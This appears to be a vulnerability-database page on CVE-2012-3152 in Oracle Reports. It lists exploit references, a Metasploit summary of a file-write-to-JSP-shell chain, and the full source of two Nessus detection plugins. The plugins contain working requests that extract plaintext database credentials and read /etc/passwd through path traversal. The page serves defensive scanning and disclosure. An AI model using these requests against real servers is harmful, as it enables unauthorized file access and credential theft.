Vulnerabilities > CVE-2012-3152 - Remote Security vulnerability in Oracle Fusion Middleware 11.1.1.4.0/11.1.1.6.0/11.1.2.0
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
NONE Summary
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the URLPARAMETER functionality allows remote attackers to read and upload arbitrary files to reports/rwservlet, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 3 |
Exploit-Db
description Oracle Forms and Reports Remote Code Execution. CVE-2012-3152. Remote exploit for windows platform id EDB-ID:31737 last seen 2016-02-03 modified 2014-02-18 published 2014-02-18 reporter metasploit source https://www.exploit-db.com/download/31737/ title Oracle Forms and Reports - Remote Code Execution description Oracle Forms and Reports 11.1 - Remote Exploit. CVE-2012-3152. Remote exploit for jsp platform file exploits/jsp/remote/31253.rb id EDB-ID:31253 last seen 2016-02-03 modified 2014-01-29 platform jsp port 80 published 2014-01-29 reporter Mekanismen source https://www.exploit-db.com/download/31253/ title Oracle Forms and Reports 11.1 - Remote Exploit type remote
Metasploit
| description | This module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution on the host. The showenv url can be used to disclose information about a server. A second vulnerability that allows arbitrary reading and writing to the host filesystem can then be used to write a shell from a remote url to a known local path disclosed from the previous vulnerability. The local path being accessible from an URL allows an attacker to perform the remote code execution using, for example, a .jsp shell. This module was tested successfully on Windows and Oracle Forms and Reports 10.1. |
| id | MSF:EXPLOIT/MULTI/HTTP/ORACLE_REPORTS_RCE |
| last seen | 2020-06-05 |
| modified | 2017-08-29 |
| published | 2014-01-30 |
| references | |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_reports_rce.rb |
| title | Oracle Forms and Reports Remote Code Execution |
Nessus
NASL family CGI abuses NASL id ORACLE_REPORTS_PASSWORD_DISCLOSURE.NASL description Nessus was able to exploit a flaw in the Oracle Reports servlet parsequery function, and was able to retrieve the plaintext database credentials for one or more users. A remote attacker can exploit this vulnerability to gain unauthorized database access. last seen 2020-06-01 modified 2020-06-02 plugin id 73120 published 2014-03-20 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73120 title Oracle Reports Servlet Parsequery Function Remote Database Credentials Exposure code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(73120); script_version("1.8"); script_cvs_date("Date: 2019/11/26"); script_cve_id("CVE-2012-3153"); script_bugtraq_id(55961); script_xref(name:"EDB-ID", value:"31253"); script_name(english:"Oracle Reports Servlet Parsequery Function Remote Database Credentials Exposure"); script_summary(english:"Tries to exploit remote database credential exposure vulnerability"); script_set_attribute(attribute:"synopsis", value: "The remote host is running a web application that exposes database credentials."); script_set_attribute(attribute:"description", value: "Nessus was able to exploit a flaw in the Oracle Reports servlet parsequery function, and was able to retrieve the plaintext database credentials for one or more users. A remote attacker can exploit this vulnerability to gain unauthorized database access."); # http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f"); # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch per the vendor's advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3153"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16"); script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_reports_detect.nbin"); script_require_keys("www/oracle_reports"); script_require_ports("Services/www", 8888); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); include("data_protection.inc"); appname = "Oracle Reports"; port = get_http_port(default:8888); install = get_install_from_kb( appname:'oracle_reports', port:port, exit_on_fail:TRUE ); # try and obtain a list of keymaps show_keymaps_uri = install['dir'] + '/rwservlet/showmap'; res = http_send_recv3(method:"GET", item:show_keymaps_uri, port:port, exit_on_fail:TRUE); if ("Reports Servlet Key Map" >!< res[2]) exit(0, "Unable to access Oracle Reports showmap function via "+build_url(port:port, qs:show_keymaps_uri)+"."); lines = split(res[2], sep:'\n', keep:FALSE); count = 0; custom_keymaps = make_list(); ignorable_keymaps = make_list( '%ENV_NAME%', 'barcodepaper', 'barcodeweb', 'breakbparam', 'charthyperlink_ias', 'charthyperlink_ids', 'distributionpaper', 'express', 'orqa', 'parmformjsp', 'pdfenhancements', 'report_defaultid', 'report_secure', 'run', 'runp', 'tutorial', 'xmldata' ); # get a list of non-default custom keymaps foreach line (lines) { if ("OraInstructionText" >!< line) continue; # table contains name the value, we want to skip over the values count++; if (!(count%2)) continue; item = eregmatch(pattern:"OraInstructionText>([^<]+)<", string:line); if (!isnull(item) && !isnull(item[1])) { keymap = chomp(item[1]); ignore = FALSE; foreach map (ignorable_keymaps) if (map == keymap) ignore = TRUE; if (!ignore) custom_keymaps = make_list(custom_keymaps, keymap); } } if (max_index(custom_keymaps) == 0) exit(0, "Failed to access Oracle Reports showmap function at "+build_url(port:port, qs:show_keymaps_uri)+"."); report = ''; parsequery_uri = install['dir'] + '/rwservlet/parsequery?'; foreach map (custom_keymaps) { res = http_send_recv3(method:"GET", item:parsequery_uri + map, port:port, exit_on_fail:TRUE); item = eregmatch(pattern:"userid=([^/]+)/([^@]+)@([^ \t]+)([ \t]|$)", string:res[2]); if (!isnull(item) && !isnull(item[1]) && !isnull(item[2]) && !isnull(item[3])) { pass = chomp(item[2]); # mask actual password except for first and last characters. if (strlen(pass) < 2) pass = crap(data:'*', length:6); else pass = strcat(pass[0], crap(data:'*', length:6), pass[strlen(pass)-1]); report += '\n Username : ' + data_protection::sanitize_user_enum(users:chomp(item[1])) + '\n Password : ' + pass + '\n Database : ' + chomp(item[3]) + '\n'; } } if (report != '') { report = '\nNessus was able to enumerate the following logins : \n' + report; if (report_verbosity > 0) security_warning(port:port, extra:report); else security_warning(port); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Oracle Reports", build_url(port:port, qs:install['dir'] + '/rwservlet'));NASL family CGI abuses NASL id ORACLE_REPORTS_FILE_ACCESS.NASL description Nessus was able to exploit a file access vulnerability in the Oracle Reports servlet and retrieve to contents of a file. A remote attacker could use this vulnerability to read or write arbitrary files on the system, ultimately leading to remote code execution. last seen 2020-03-18 modified 2014-03-20 plugin id 73119 published 2014-03-20 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73119 title Oracle Reports Servlet Remote File Access code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(73119); script_version("1.9"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/02/26"); script_cve_id("CVE-2012-3152"); script_bugtraq_id(55955); script_xref(name:"EDB-ID", value:"31253"); script_name(english:"Oracle Reports Servlet Remote File Access"); script_summary(english:"Tries to read a file"); script_set_attribute(attribute:"synopsis", value: "The remote web server hosts a web application that has a file access vulnerability."); script_set_attribute(attribute:"description", value: "Nessus was able to exploit a file access vulnerability in the Oracle Reports servlet and retrieve to contents of a file. A remote attacker could use this vulnerability to read or write arbitrary files on the system, ultimately leading to remote code execution."); # http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f"); # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch per the vendor's advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3152"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16"); script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_reports_detect.nbin"); script_require_keys("www/oracle_reports"); script_require_ports("Services/www", 8888); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); include("data_protection.inc"); appname = "Oracle Reports"; port = get_http_port(default:8888); install = get_install_from_kb( appname:'oracle_reports', port:port, exit_on_fail:TRUE ); vuln_script = install['dir'] + '/rwservlet'; traversal = mult_str(str:"../", nb:15); file_list = make_list(traversal + "windows/win.ini", traversal + "winnt/win.ini", "c:/windows/win.ini", "c:/winnt/win.ini", "/etc/passwd"); exploit_request = NULL; exploit_response = NULL; foreach file (file_list) { exploit = vuln_script + "?destype=cache&desformat=html&JOBTYPE=rwurl&URLPARAMETER=%22file:///" + file + "%22"; res = http_send_recv3(method:"GET", item:exploit, port:port, exit_on_fail:TRUE); if ( # windows platforms ( "win.ini" >< file && ( "[Mail]" >< res[2] || "[fonts]" >< res[2] || "; for 16-bit app support" >< res[2] ) ) || # *nix ( "passwd" >< file && res[2] =~ " root:.*:0:[01]:" ) ) { exploit_request = exploit; exploit_response = chomp(res[2]); break; } } if (!isnull(exploit_request)) { report = NULL; filename = NULL; output = NULL; request = NULL; exploit_request = build_url(port:port, qs:exploit_request); if (report_verbosity > 0) { report = '\n' + 'Nessus was able to exploit the vulnerability with the following' + '\n' + 'request :' + '\n' + '\n' + ' ' + exploit_request + '\n'; if (report_verbosity > 1) { output = data_protection::redact_etc_passwd(output:exploit_response); filename = "win.ini"; if ("passwd" >< file) filename = "/etc/passwd"; request = make_list(req); } } security_report_v4(port:port, extra:report, severity:SECURITY_WARNING, request:request, file:filename, output:output); exit(0); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:'/'));
Packetstorm
| data source | https://packetstormsecurity.com/files/download/125236/oracle_reports_rce.rb.txt |
| id | PACKETSTORM:125236 |
| last seen | 2016-12-05 |
| published | 2014-02-18 |
| reporter | Mekanismen |
| source | https://packetstormsecurity.com/files/125236/Oracle-Forms-Reports-Remote-Code-Execution.html |
| title | Oracle Forms / Reports Remote Code Execution |
Seebug
bulletinFamily exploit description No description provided by source. id SSV:85052 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-85052 title Oracle Forms and Reports - Remote Code Execution bulletinFamily exploit description No description provided by source. id SSV:84591 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-84591 title Oracle Forms and Reports 11.1 - Remote Exploit
References
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
- http://blog.netinfiltration.com/2014/01/19/upcoming-exploit-release-oracle-forms-and-reports-11g/
- http://seclists.org/fulldisclosure/2014/Jan/186
- http://www.exploit-db.com/exploits/31253
- http://www.mandriva.com/security/advisories?name=MDVSA-2013:150
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
- http://www.osvdb.org/86394
- http://www.osvdb.org/86395
- http://www.securityfocus.com/bid/55955
- http://www.youtube.com/watch?v=NinvMDOj7sM
- https://exchange.xforce.ibmcloud.com/vulnerabilities/79295